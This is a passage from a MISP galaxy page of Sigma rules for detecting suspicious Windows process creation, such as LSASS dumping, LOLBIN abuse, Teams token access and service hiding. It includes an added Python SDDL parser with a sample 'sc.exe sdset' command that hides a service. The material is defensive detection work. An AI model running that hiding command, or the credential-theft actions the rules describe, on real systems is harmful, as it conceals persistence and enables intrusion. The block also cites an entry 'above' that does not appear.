Metadata key Value
author Karneades, Swisscom CSIRT
creation_date 2019/08/05
falsepositive No established falsepositives
filename proc_creation_win_mmc_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.003']
Related clusters

To see the related clusters, click here.

Suspicious Scheduled Task Creation via Masqueraded XML File

Detects the creation of a scheduled task using the "-XML" flag with a file that lacks the ".xml" extension. This behavior could be indicative of a defense evasion attempt during persistence.

Internal MISP references

UUID dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c which can be used as unique global reference for Suspicious Scheduled Task Creation via Masqueraded XML File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel, Elastic (idea)
creation_date 2023/04/20
falsepositive ['Unknown']
filename proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1036.005', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Service DACL Abuse To Hide Services Via Sc.EXE

Detects usage of the "sc.exe" utility to set a service security descriptor ("sdset") with the special permissions seen used by threat actors to make the service hidden and unremovable.

Internal MISP references

UUID a537cfc3-4297-4789-92b5-345bfd845ad0 which can be used as unique global reference for Service DACL Abuse To Hide Services Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades)
creation_date 2021/12/20
falsepositive ['Unknown']
filename proc_creation_win_sc_sdset_hide_sevices.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.
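Both the "Abuse of Service Permissions to Hide Services Via Set-Service" entry and the "Service DACL Abuse To Hide Services Via Sc.EXE" entry above come down to the same artefact: an SDDL string with Deny ACEs that strip query and delete rights from the principals that normally see and manage services. The following added example (not the Sigma rules' own logic and not part of the MISP galaxy) parses the DACL out of either command form and reports which rights are denied to whom. The right-code table is the standard SDDL generic-rights mapping for service objects; the sample SDDL strings are constructed (the hiding one follows the commonly published pattern, the other mirrors a typical default service descriptor).

```python
import re
from typing import Dict, List, Set

# Added example for the Set-Service and sc.exe sdset rules. Illustrative code, not the
# Sigma rules' own logic and not part of the MISP galaxy; sample SDDL strings are constructed.

# SDDL generic-right codes as they apply to service objects.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
WATCHED_SIDS = {"IU": "Interactive", "SU": "Service logon", "BA": "Administrators",
                "BU": "Users", "WD": "Everyone"}
HIDING_RIGHTS = {"CC", "LC", "SW"}    # denied -> service drops out of sc query / Get-Service
LOCKING_RIGHTS = {"DC", "WP", "SD"}   # denied -> cannot be reconfigured, stopped or deleted

DACL_RE = re.compile(r"D:[A-Z]*((?:\([^)]*\))+)")
ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_dacl(text: str) -> List[Dict]:
    """Parse the DACL ACEs out of an SDDL string (or a command line that embeds one)."""
    m = DACL_RE.search(text)
    if not m:
        return []
    aces = []
    for ace in ACE_RE.findall(m.group(1)):
        parts = ace.split(";")
        if len(parts) != 6:               # type;flags;rights;object;inherit_object;sid
            continue
        ace_type, _flags, rights, _obj, _inh, sid = parts
        if rights.startswith("0x"):
            right_set: Set[str] = {rights}   # raw access mask; not decoded in this example
        else:
            right_set = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        aces.append({"type": ace_type, "rights": right_set, "sid": sid})
    return aces


def assess_service_sddl(cmdline: str) -> List[str]:
    """Findings for an 'sc.exe sdset' or 'Set-Service -SecurityDescriptorSddl' command line."""
    low = cmdline.lower()
    if "sdset" not in low and "securitydescriptorsddl" not in low:
        return []
    findings = []
    for ace in parse_dacl(cmdline):
        if ace["type"] != "D" or ace["sid"] not in WATCHED_SIDS:
            continue          # only explicit Deny ACEs on well-known principals matter here
        who = WATCHED_SIDS[ace["sid"]]
        hidden = sorted(ace["rights"] & HIDING_RIGHTS)
        locked = sorted(ace["rights"] & LOCKING_RIGHTS)
        if hidden:
            findings.append(f"hidden from {who}: denies " + ", ".join(SERVICE_RIGHTS[r] for r in hidden))
        if locked:
            findings.append(f"locked against {who}: denies " + ", ".join(SERVICE_RIGHTS[r] for r in locked))
    return findings


# Constructed samples (not real telemetry).
HIDE_SDDL = ("D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)"
             "(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
SAMPLE_COMMAND_LINES = [
    f'sc.exe sdset evilsvc "{HIDE_SDDL}"',
    f"powershell.exe -c \"Set-Service -Name evilsvc -SecurityDescriptorSddl '{HIDE_SDDL}'\"",
    f'sc.exe sdset MyService "{DEFAULT_SDDL}"',       # resetting to defaults: no Deny ACEs
    "sc.exe sdshow evilsvc",                          # read-only, not a change
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(assess_service_sddl(line), "<-", line[:40])
```

Parsing the ACEs rather than matching the literal right string means a reordered (`LCDCWPDTSD`) or reduced (`LC` only) variant still produces a finding, and the output says what was taken away from whom, which is what an analyst needs to confirm the service is actually hidden before reverting the descriptor.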

Execution from Suspicious Folder

Detects a suspicious execution from an uncommon folder

Internal MISP references

UUID 3dfd06d2-eaf4-4532-9555-68aca59f57c4 which can be used as unique global reference for Execution from Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tim Shelton
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_susp_execution_path.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Potential Process Injection Via Msra.EXE

Detects potential process injection via Microsoft Remote Assistance (Msra.exe) by looking at suspicious child processes spawned from it. Msra.exe has been abused by many threat actors for discovery and persistence.

Internal MISP references

UUID 744a188b-0415-4792-896f-11ddb0588dbc which can be used as unique global reference for Potential Process Injection Via Msra.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexander McDonald
creation_date 2022/06/24
falsepositive ['Legitimate use of Msra.exe']
filename proc_creation_win_msra_process_injection.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

LSASS Dump Keyword In CommandLine

Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.

Internal MISP references

UUID ffa6861c-4461-4f59-8a41-578c39f3f23e which can be used as unique global reference for LSASS Dump Keyword In CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/10/24
falsepositive ['Unlikely']
filename proc_creation_win_susp_lsass_dmp_cli_keywords.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

Internal MISP references

UUID 074e0ded-6ced-4ebd-8b4d-53f55908119d which can be used as unique global reference for AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020/10/06
falsepositive ['Unlikely']
filename proc_creation_win_winrm_awl_bypass.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Suspicious Splwow64 Without Params

Detects suspicious Splwow64.exe process without any command line parameters

Internal MISP references

UUID 1f1a8509-2cbb-44f5-8751-8e1571518ce2 which can be used as unique global reference for Suspicious Splwow64 Without Params in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_splwow64_cli_anomaly.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

CreateDump Process Dump

Detects use of the createdump.exe LOLBIN utility to dump process memory.

Internal MISP references

UUID 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48 which can be used as unique global reference for CreateDump Process Dump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/04
falsepositive ['Command lines that use the same flags']
filename proc_creation_win_createdump_lolbin_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

RunDLL32 Spawning Explorer

Detects RunDLL32.exe spawning explorer.exe as a child process, which is very uncommon; the Gamarue malware has been observed launching explorer.exe this way.

Internal MISP references

UUID caa06de8-fdef-4c91-826a-7f9e163eef4b which can be used as unique global reference for RunDLL32 Spawning Explorer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim, CD_ROM_
creation_date 2022/04/27
falsepositive ['Unknown']
filename proc_creation_win_rundll32_spawn_explorer.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']

Suspicious Copy From or To System Directory

Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another location on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.

Internal MISP references

UUID fff9d2b7-e11c-4a69-93d3-40ef66189767 which can be used as unique global reference for Suspicious Copy From or To System Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/07/03
falsepositive ['Depends on scripts and administrative tools used in the monitored environment (for example admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)', 'When cmd.exe and xcopy.exe are called directly', 'When the command contains the keywords but not in the correct order']
filename proc_creation_win_susp_copy_system_dir.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']

HackTool - Empire PowerShell Launch Parameters

Detects suspicious PowerShell command line parameters used in Empire

Internal MISP references

UUID 79f4ede3-402e-41c8-bc3e-ebbf5f162581 which can be used as unique global reference for HackTool - Empire PowerShell Launch Parameters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/04/20
falsepositive ['Other tools that incidentally use the same command line parameters']
filename proc_creation_win_hktl_empire_powershell_launch.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)

Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)

Internal MISP references

UUID 2afafd61-6aae-4df4-baed-139fa1f4c345 which can be used as unique global reference for Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2019/01/16
falsepositive ['NTDS maintenance']
filename proc_creation_win_ntdsutil_usage.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']

PUA - PingCastle Execution From Potentially Suspicious Parent

Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.

Internal MISP references

UUID b37998de-a70b-4f33-b219-ec36bf433dc0 which can be used as unique global reference for PUA - PingCastle Execution From Potentially Suspicious Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2024/01/11
falsepositive ['Unknown']
filename proc_creation_win_pua_pingcastle_script_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.reconnaissance', 'attack.t1595']

Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN

dotnet.exe will execute any DLL and run unsigned code

Internal MISP references

UUID d80d5c81-04ba-45b4-84e4-92eba40e0ad3 which can be used as unique global reference for Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community
creation_date 2020/10/18
falsepositive ['System administrator Usage']
filename proc_creation_win_lolbin_dotnet.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

VMToolsd Suspicious Child Process

Detects suspicious child process creations of VMware Tools process which may indicate persistence setup

Internal MISP references

UUID 5687f942-867b-4578-ade7-1e341c46e99a which can be used as unique global reference for VMToolsd Suspicious Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author bohops, Bhabesh Raj
creation_date 2021/10/08
falsepositive ['Legitimate use by VM administrator']
filename proc_creation_win_vmware_vmtoolsd_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1059']

Veeam Backup Database Suspicious Query

Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.

Internal MISP references

UUID 696bfb54-227e-4602-ac5b-30d9d2053312 which can be used as unique global reference for Veeam Backup Database Suspicious Query in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/04
falsepositive ['Unknown']
filename proc_creation_win_sqlcmd_veeam_db_recon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1005']

Detected Windows Software Discovery

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.

Internal MISP references

UUID e13f668e-7f95-443d-98d2-1816a7648a7b which can be used as unique global reference for Detected Windows Software Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/16
falsepositive ['Legitimate administration activities']
filename proc_creation_win_reg_software_discovery.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1518']

Windows Shell/Scripting Processes Spawning Suspicious Programs

Detects suspicious child processes of Windows shell and scripting processes such as wscript, rundll32, powershell, mshta, etc.

Internal MISP references

UUID 3a6586ad-127a-4d3b-a677-1e6eacdf8fde which can be used as unique global reference for Windows Shell/Scripting Processes Spawning Suspicious Programs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tim Shelton
creation_date 2018/04/06
falsepositive ['Administrative scripts', 'Microsoft SCCM']
filename proc_creation_win_susp_shell_spawn_susp_program.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1059.005', 'attack.t1059.001', 'attack.t1218']

AgentExecutor PowerShell Execution

Detects execution of the AgentExecutor.exe binary, which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by the 6th positional argument

Internal MISP references

UUID 7efd2c8d-8b18-45b7-947d-adfe9ed04f61 which can be used as unique global reference for AgentExecutor PowerShell Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), memory-shards
creation_date 2022/12/24
falsepositive ['Legitimate use via Intune management. Exclude script paths and names to reduce the FP rate']
filename proc_creation_win_agentexecutor_potential_abuse.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Powershell Inline Execution From A File

Detects inline execution of PowerShell code from a file

Internal MISP references

UUID ee218c12-627a-4d27-9e30-d6fb2fe22ed2 which can be used as unique global reference for Powershell Inline Execution From A File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/25
falsepositive ['Unknown']
filename proc_creation_win_powershell_exec_data_file.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

New Kernel Driver Via SC.EXE

Detects creation of a new service (kernel driver) with the type "kernel"

Internal MISP references

UUID 431a1fdb-4799-4f3b-91c3-a683b003fc49 which can be used as unique global reference for New Kernel Driver Via SC.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/14
falsepositive ['Rare legitimate installation of kernel drivers via sc.exe']
filename proc_creation_win_sc_new_kernel_driver.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']

Gpresult Display Group Policy Information

Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information

Internal MISP references

UUID e56d3073-83ff-4021-90fe-c658e0709e72 which can be used as unique global reference for Gpresult Display Group Policy Information in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/01
falsepositive ['Unknown']
filename proc_creation_win_gpresult_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1615']

Use of FSharp Interpreters

The FSharp interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and are listed in Microsoft's recommended block rules.

Internal MISP references

UUID b96b2031-7c17-4473-afe7-a30ce714db29 which can be used as unique global reference for Use of FSharp Interpreters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022/06/02
falsepositive ['Legitimate use by a software developer.']
filename proc_creation_win_lolbin_fsharp_interpreters.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']

Hardware Model Reconnaissance Via Wmic.EXE

Detects the execution of WMIC with the "csproduct" alias, which is used to obtain information such as hardware models and vendor information

Internal MISP references

UUID 3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d which can be used as unique global reference for Hardware Model Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/02/14
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_csproduct.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'car.2016-03-002']

Potentially Suspicious Command Targeting Teams Sensitive Files

Detects a command line containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged-in accounts.

Internal MISP references

UUID d2eb17db-1d39-41dc-b57f-301f6512fa75 which can be used as unique global reference for Potentially Suspicious Command Targeting Teams Sensitive Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery
creation_date 2022/09/16
falsepositive ['Unknown']
filename proc_creation_win_teams_suspicious_command_line_cred_access.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1528']

Remote Access Tool - AnyDesk Piped Password Via CLI

Detects piping the password to an AnyDesk instance via CMD and the '--set-password' flag.

Internal MISP references

UUID b1377339-fda6-477a-b455-ac0923f9ec2c which can be used as unique global reference for Remote Access Tool - AnyDesk Piped Password Via CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/28
falsepositive ['Legitimate piping of the password to AnyDesk', "Some FP could occur with similar tools that use the same command line '--set-password'"]
filename proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

VolumeShadowCopy Symlink Creation Via Mklink

Shadow Copies storage symbolic link creation using operating system utilities

Internal MISP references

UUID 40b19fa6-d835-400c-b301-41f3a2baacaf which can be used as unique global reference for VolumeShadowCopy Symlink Creation Via Mklink in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community
creation_date 2019/10/22
falsepositive ['Legitimate administrator working with shadow copies, access for backup purposes']
filename proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.003']

Suspicious LOLBIN AccCheckConsole

Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL

Internal MISP references

UUID 0f6da907-5854-4be6-859a-e9958747b0aa which can be used as unique global reference for Suspicious LOLBIN AccCheckConsole in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/06
falsepositive ['Legitimate use of the UI Accessibility Checker']
filename proc_creation_win_lolbin_susp_acccheckconsole.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Import LDAP Data Interchange Format File Via Ldifde.EXE

Detects the execution of "Ldifde.exe" with the import flag "-i". This can be abused to include HTTP-based arguments which allow the arbitrary download of files from a remote server.

Internal MISP references

UUID 6f535e01-ca1f-40be-ab8d-45b19c0c8b7f which can be used as unique global reference for Import LDAP Data Interchange Format File Via Ldifde.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2022/09/02
falsepositive ['Since the content of the files are unknown, false positives are expected']
filename proc_creation_win_ldifde_file_load.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.defense_evasion', 'attack.t1218', 'attack.t1105']

Suspicious Microsoft Office Child Process

Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)

Internal MISP references

UUID 438025f9-5856-4663-83f7-52f878a70a50 which can be used as unique global reference for Suspicious Microsoft Office Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io
creation_date 2018/04/06
falsepositive ['Unknown']
filename proc_creation_win_office_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1047', 'attack.t1204.002', 'attack.t1218.010']

Suspicious Call by Ordinal

Detects suspicious rundll32.exe calls of DLL exports by ordinal

Internal MISP references

UUID e79a9e79-eb72-4e78-a628-0e7e8f59e89c which can be used as unique global reference for Suspicious Call by Ordinal in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/22
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment', 'Windows control panel elements have been identified as source (mmc)']
filename proc_creation_win_rundll32_by_ordinal.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']

Suspicious Use of CSharp Interactive Console

Detects the execution of CSharp interactive console by PowerShell

Internal MISP references

UUID a9e416a8-e613-4f8b-88b8-a7d1d1af2f61 which can be used as unique global reference for Suspicious Use of CSharp Interactive Console in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael R. (@nahamike01)
creation_date 2020/03/08
falsepositive ['Possible depending on environment. Pair with other factors such as net connections, command-line args, etc.']
filename proc_creation_win_csi_use_of_csharp_console.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1127']

PUA - Wsudo Suspicious Execution

Detects usage of wsudo (Windows Sudo Utility), a tool that lets the user execute programs with different permissions (System, Trusted Installer, Administrator, etc.)

Internal MISP references

UUID bdeeabc9-ff2a-4a51-be59-bb253aac7891 which can be used as unique global reference for PUA - Wsudo Suspicious Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/02
falsepositive ['Unknown']
filename proc_creation_win_pua_wsudo_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.t1059']

Use of TTDInject.exe

Detects the execution of TTDInject.exe, which is used by Windows 10 v1809 and newer for Time Travel Debugging (underlying call of tttracer.exe)

Internal MISP references

UUID b27077d6-23e6-45d2-81a0-e2b356eea5fd which can be used as unique global reference for Use of TTDInject.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/16
falsepositive ['Legitimate use']
filename proc_creation_win_lolbin_ttdinject.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']

Suspicious PowerShell IEX Execution Patterns

Detects suspicious ways to run Invoke-Expression using the IEX alias

Internal MISP references

UUID 09576804-7a05-458e-a817-eb718ca91f54 which can be used as unique global reference for Suspicious PowerShell IEX Execution Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/03/24
falsepositive ['Legitimate scripts that use IEX']
filename proc_creation_win_powershell_iex_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Deny Service Access Using Security Descriptor Tampering Via Sc.EXE

Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.

Internal MISP references

UUID 99cf1e02-00fb-4c0d-8375-563f978dfd37 which can be used as unique global reference for Deny Service Access Using Security Descriptor Tampering Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonhnathan Ribeiro, oscd.community
creation_date 2020/10/16
falsepositive ['Unknown']
filename proc_creation_win_sc_sdset_deny_service_access.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1543.003']

Ping Hex IP

Detects a ping command that uses a hex encoded IP address

Internal MISP references

UUID 1a0d4aba-7668-4365-9ce4-6d79ab088dfd which can be used as unique global reference for Ping Hex IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/03/23
falsepositive ['Unlikely, because no sane admin pings IP addresses in a hexadecimal form']
filename proc_creation_win_ping_hex_ip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1140', 'attack.t1027']

LOLBIN Execution Of The FTP.EXE Binary

Detects ftp.exe script execution with the "-s" or "/s" flag and any child processes run by ftp.exe

Internal MISP references

UUID 06b401f4-107c-4ff9-947f-9ec1e7649f1e which can be used as unique global reference for LOLBIN Execution Of The FTP.EXE Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename proc_creation_win_lolbin_ftp.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.defense_evasion', 'attack.t1202']

Response File Execution Via Odbcconf.EXE

Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.

Internal MISP references

UUID 5f03babb-12db-4eec-8c82-7b4cb5580868 which can be used as unique global reference for Response File Execution Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/22
falsepositive ['The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary.']
filename proc_creation_win_odbcconf_response_file.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']

Potential SMB Relay Attack Tool Execution

Detects different hacktools used for relay attacks on Windows for privilege escalation

Internal MISP references

UUID 5589ab4f-a767-433c-961d-c91f3f704db1 which can be used as unique global reference for Potential SMB Relay Attack Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/24
falsepositive ['Legitimate files with these rare hacktool names']
filename proc_creation_win_hktl_relay_attacks_tools.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1557.001']

Suspicious Active Directory Database Snapshot Via ADExplorer

Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the Active Directory database to a suspicious directory.

Internal MISP references

UUID ef61af62-bc74-4f58-b49b-626448227652 which can be used as unique global reference for Suspicious Active Directory Database Snapshot Via ADExplorer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
